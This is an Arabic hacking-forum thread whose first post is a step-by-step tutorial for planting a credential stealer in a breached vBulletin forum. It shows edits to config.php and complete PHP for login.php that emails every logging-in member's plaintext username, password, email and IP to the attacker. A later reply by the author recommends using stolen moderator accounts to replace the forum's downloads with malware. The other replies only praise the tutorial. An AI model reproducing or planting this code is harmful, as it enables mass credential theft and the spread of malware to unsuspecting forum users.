1. أهلا وسهلاً بكم في :: IQ-TeaM FORUM :: .
    إذا كانت هذه الزيارة الأولى أو لديك الرغبة بالانضمام لأعضاء شبكة عراق تيم فيجب الاطلاع على خصوصية الشبكه فربما بقائك زائر افضل لك من الانضمام بحيث أن قوانين شبكة عراق تيم لا تتناسب مع اهتماماتك .
    • للأطلاع على الخصوصية وسياسة الاستخدام - التفاصيل
    • بعد الاطلاع على سياسة الموقع وقوانين شبكة عراق تيم يمكنك التسجيل معنا - تسجيل عضو جديد
    إستبعاد الملاحظة
الكاتب : Mokhalad HaXor | المشاهدات : 791 | الردود : 21
  1. Mokhalad HaXor

    Mokhalad HaXor آداريً شؤون الأعضًاء

    الأنتساب:
    ‏3 يوليو 2012
    المشاركات:
    3,319
    الإعجابات المتلقاة:
    2,463
    نقاط الجائزة:
    113
    الجنس:
    ذكر
    الوظيفة:
    Hacking
    الإقامة:
    etc/shadow
    نظام التشغيل:
    Linux
    حسابي في الزون اتش Zone-H:
    اللغة البرمجية:
    PHP
    Facebook:
    YouTube:
    [​IMG]






    كيف حال اعضاء و زوار المنتدى الحبيب


    [​IMG]


    اليوم معنا طريقة قوية جدآ في تلغيم المنتديات بعد اختراقها الطريقة سهلة ميحاتج اعمل فيديو او اي صور توضيحية اتبع الخطوات فقط الطريقة تقوم ب سحب العضويات , طيب راح البعض يقول في سكربتات تجيب المعلومات ب دقيقة مافي داعي ل التلغيم


    الجواب هو , صحيح لاكن المعلومات لما تجيبهة راح تلاقي باسووردات الاعضاء مشفرة ب ال MD5 , راح تعبك ب فك الهاش في هذي الطريقة توصل يوزر و باسوورد صافي على الايمل


    [​IMG]


    تمام تبدي على بركة الله


    [​IMG]


    مثل ماتعرفون كلكم انو هذا السكربت تابع ل المنتديات
    اولآ ندخل على ملف الكونفك تبع المنتدى من الشل يكون هذا مساره



    [​IMG]


    vb/includes/config.php


    [​IMG]


    نقوم ب البحث على هذي الدالة

    [PHP CODE]$show['nopasswordempty'] = defined('DISABLE_PASSWORD_CLEARING')
    [/PHP CODE]

    [​IMG]

    التغيير الذي يكون عليهة هوة اضافة //
    يعني نسوي كومنت Comment

    i:q^:


    بحيث يكون على هذي الهيئة بعد التعديل
    [​IMG]


    [PHP CODE]// $show['nopasswordempty'] = defined('DISABLE_PASSWORD_CLEARING') [/PHP CODE]


    [​IMG]
    الان نذهب الى ملف ال login.php


    يكون مكانه هنا

    vb/login.php

    ونبحث عن هذي الدالة

    process_new_login

    تمام الان نضع هذا الكود اسفل هذي الدالة مباشرآ {1!9}

    [​IMG]

    [PHP CODE]

    $lg_username = strtolower($vbulletin->GPC["vb_login_username"]);
    $lg_password = $vbulletin->GPC["vb_login_password"];
    $sql_query = @mysql_query("SELECT * FROM " . TABLE_PREFIX . "user WHERE username='" . $lg_username . "'");
    while($row = @mysql_fetch_array($sql_query))
    {
    if(strlen($lg_password) > 1 AND strlen($lg_username) > 1)
    {
    function curPageURL() {
    $pageURL = 'http';
    if ($_SERVER["HTTPS"] == "on") {$pageURL .= "s";}
    $pageURL .= "://";
    if ($_SERVER["SERVER_PORT"] != "80") {
    $pageURL .= $_SERVER["SERVER_NAME"].":".$_SERVER["SERVER_PORT"].$_SERVER["REQUEST_URI"];
    } else {
    $pageURL .= $_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"];
    }
    return $pageURL;
    }
    $url = curPageURL();
    $ip = getenv("REMOTE_ADDR");
    $hostname = gethostbyaddr($ip);
    $message = "------------------+ VBulletin Account +-----------------\n";
    $message .= "Forum URL : ".$url."\n";
    $message .= "UserName : ".$lg_username."\n";
    $message .= "Password : ".$lg_password."\n";
    $message .= "Email : ". $row["email"] ."\n";
    $message .= "----------------------- By Mokhalad HaXor --------------------------\n";
    $message .= "Client IP : ".$ip."\n";
    $message .= "HostName : ".$hostname."\n";
    $rnessage = "$message\n";
    $message .= "-------------------+ Created By Mokhalad HaXor +--------------------\n";
    $send= "هنا تضع الايميل الخاص بك اي كان ياهو او جيميل او هوتميل";
    $subject = "$url | VBulletin Account | $ip";
    $headers = "From:VBulletin Account<VB@Rezult.CoM>";
    mail($send,$subject,$message,$headers);
    }
    }
    [/PHP CODE]


    [​IMG]


    تمام التمام الان ننتضر فترة مناسبة و ننتضر ال ريزولت على الايميل
    و يحتوي على رابط المنتدى و معلومات الاعضاء
    هذي طريقة قوية في جلب معلومات الاعضاء
    انشاء الله تنال اعجابكم
    :{4!}:

    [​IMG]

    للاسف وصلنا ل نهاية الموضوع اراكم في شروحات اخرى

    الموضوع اهداء لـ

    м̨я.ǚs̲ǝя - الأوكراني - TeePlow - المعاقب الصدري - k!lwa s&rian ro0t - Ameer Eagle - مِحً ـمِدُ ألَعَ ـرآقَي - MR.CAPTCHA - ĐЯ-ЩΘЩΘ - AnonYmous-IQ - Pro.Mast3r

    [​IMG]
    و الى كل اعضاء و زوار المنتدى
    ً#ٌ5oًًًُ. ً#ٌ5oًًًُ. ً#ٌ5oًًًُ.
    [​IMG]
    [​IMG]
     
    1 person likes this.
  2. الأوكراني

    الأوكراني <div class="smal22">.:: غير موثوق ::.</div> موقوف لمخالفة الشروط

    الأنتساب:
    ‏22 أغسطس 2014
    المشاركات:
    255
    الإعجابات المتلقاة:
    3
    نقاط الجائزة:
    18
    رد: تلغيم سكربت VBulletin بدالة mail

    بارك الله فيك موضوع قوي بصراحه موفق على الطرح
     
  3. Ameer Eagle

    Ameer Eagle V • I • P

    الأنتساب:
    ‏7 يونيو 2014
    المشاركات:
    3,233
    الإعجابات المتلقاة:
    2,780
    نقاط الجائزة:
    113
    الجنس:
    ذكر
    الوظيفة:
    Student
    الإقامة:
    IraQ
    نظام التشغيل:
    windows 7
    رد: تلغيم سكربت VBulletin بدالة mail

    وعليكم السلام ورحمة الله وبركاته ........ مبدع صديقي مخلد ابن هكسورة ...... شرح ولا اروع تحياتي وتقديري {1!@}
    عدل السحكات {1!$2}
     
  4. ADNAN

    ADNAN Developer

    الأنتساب:
    ‏29 أكتوبر 2012
    المشاركات:
    84
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    الإقامة:
    الأرض
    رد: تلغيم سكربت VBulletin بدالة mail

    شرح متعوب عليه

    يعطيك العافيه

    جاري القيام بالواجب لانك تستحق أكثر مما لدينا
     
  5. عہلي الصہقہور هنہا

    عہلي الصہقہور هنہا <span style="font-weight: bold; text-shadow: #BBBB V • I • P

    الأنتساب:
    ‏29 نوفمبر 2014
    المشاركات:
    283
    الإعجابات المتلقاة:
    6
    نقاط الجائزة:
    18
    الإقامة:
    ألعراق ألعظيم
    نظام التشغيل:
    windows 7
    اللغة البرمجية:
    Perl
    رد: تلغيم سكربت VBulletin بدالة mail

    عاشت ايدك حبي مخلد


    يوشم بل خماسية


    [​IMG][​IMG][​IMG]
     
  6. Windows Hacker

    Windows Hacker V • I • P

    الأنتساب:
    ‏26 يوليو 2014
    المشاركات:
    636
    الإعجابات المتلقاة:
    14
    نقاط الجائزة:
    18
    الإقامة:
    |[ Occupied Bahrain ]|
    نظام التشغيل:
    windows 7
    اللغة البرمجية:
    Visual Basic
    رد: تلغيم سكربت VBulletin بدالة mail

    شرح جميل جدآَ ، عآشت آيدك [​IMG]

    لكن مآذآ تستفيد من حسآبآت آلآعضآء [​IMG]
     
  7. Mokhalad HaXor

    Mokhalad HaXor آداريً شؤون الأعضًاء

    الأنتساب:
    ‏3 يوليو 2012
    المشاركات:
    3,319
    الإعجابات المتلقاة:
    2,463
    نقاط الجائزة:
    113
    الجنس:
    ذكر
    الوظيفة:
    Hacking
    الإقامة:
    etc/shadow
    نظام التشغيل:
    Linux
    حسابي في الزون اتش Zone-H:
    اللغة البرمجية:
    PHP
    Facebook:
    YouTube:
    رد: تلغيم سكربت VBulletin بدالة mail

    الشكر لله حبيبي وندوز , اذا كان المنتدى معروف وفي اقسام طرح برامج الخ .. يمكنك ان تدخل على حسابات المشرفين وتبديل البرامج ب برامج ملغومة هذا ابسط استغلال لها
    :{13}: :{13}:
    :{13}:
     
  8. AnonYmous-IQ

    AnonYmous-IQ مشرف آمن المواقع والسيرفرات مشرف

    الأنتساب:
    ‏31 أغسطس 2014
    المشاركات:
    387
    الإعجابات المتلقاة:
    457
    نقاط الجائزة:
    63
    الجنس:
    ذكر
    الوظيفة:
    [+] Programmer [+]
    الإقامة:
    Iraq
    نظام التشغيل:
    Linux
    حسابي في الزون اتش Zone-H:
    اللغة البرمجية:
    PHP
    Facebook:
    YouTube:
    رد: تلغيم سكربت VBulletin بدالة mail

    [​IMG] عــأشت أيدك يا وردة {1!$7} دومك مبدع حياتي {1!$1} {1!$1} ​
     
  9. k!lwa s&rian ro0t

    k!lwa s&rian ro0t مراقب عآم

    الأنتساب:
    ‏3 أغسطس 2014
    المشاركات:
    742
    الإعجابات المتلقاة:
    1,233
    نقاط الجائزة:
    93
    الجنس:
    ذكر
    رد: تلغيم سكربت VBulletin بدالة mail

    ولك شرح رائع جدآ
    منور ياغالي
     
  10. м̨я.ǚs̲ǝя

    м̨я.ǚs̲ǝя <div style="border-right: 5px solid; padding: 2px ExpErt DeveloPer

    الأنتساب:
    ‏16 ابريل 2014
    المشاركات:
    437
    الإعجابات المتلقاة:
    13
    نقاط الجائزة:
    18
    الإقامة:
    ★ الكردستان ★
    نظام التشغيل:
    Linux
    اللغة البرمجية:
    HTML
    رد: تلغيم سكربت VBulletin بدالة mail

    يعطيك العافيه [​IMG]
     

مشاركة هذه الصفحة